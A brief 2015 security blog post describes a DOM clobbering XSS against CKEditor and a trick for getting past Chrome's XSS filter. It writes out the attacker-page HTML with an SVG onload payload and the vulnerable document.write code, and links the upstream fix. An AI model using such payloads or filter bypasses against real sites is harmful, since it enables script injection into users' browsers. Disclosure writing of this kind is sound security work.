Chrome XSS filter bypass for a DOM clobbering attack

I Found an Interesting Chrome XSS filter bypass in @0x6D6172696F's @nullcon training for this DOM clobbering attack

Window.opener can sometimes act nasty to launch XSS attacks. There is an interesting XSS filter bypass which I found during Mario Heiderich’s training at NullCon, Goa 2015.

In the below DOM clobbering attack (CKEditor DOM XSS issue), a page hosting the following malicious link will trigger DOM XSS on the target application once clicked:

<a href="vuln.html#<svg onload=alert(1)>" id="_cke_htmlToLoad" target="_blank">XSS ME!</a>

The above attack vector will only work on IE and will be blocked by Chrome’s XSS filter. A way to bypass is to craft the attacker page with the following code:

<a href="#<svg onload=alert(1)>" id="_cke_htmlToLoad"></a>
<a href="vuln.html" target="_blank" id="_c">XSS ME!</a>

Vulnerable code:
<script>

var doc = document;
doc.open();
doc.write( window.opener._cke_htmlToLoad ); // << Vulnerable code
doc.close();

delete window.opener._cke_htmlToLoad;

</script>

https://git.uwaterloo.ca/libraries/ckeditor/commit/5f13374b015240ba7cda1c0348c5468a17fb701a.diff [Changelog for the XSS fix]

Tweet: https://twitter.com/VaibhavGupta_1/status/568732278932639744

Found on: 05 Feb 2015

Exploits Work

Chrome XSS filter bypass for a DOM clobbering attack

Related Posts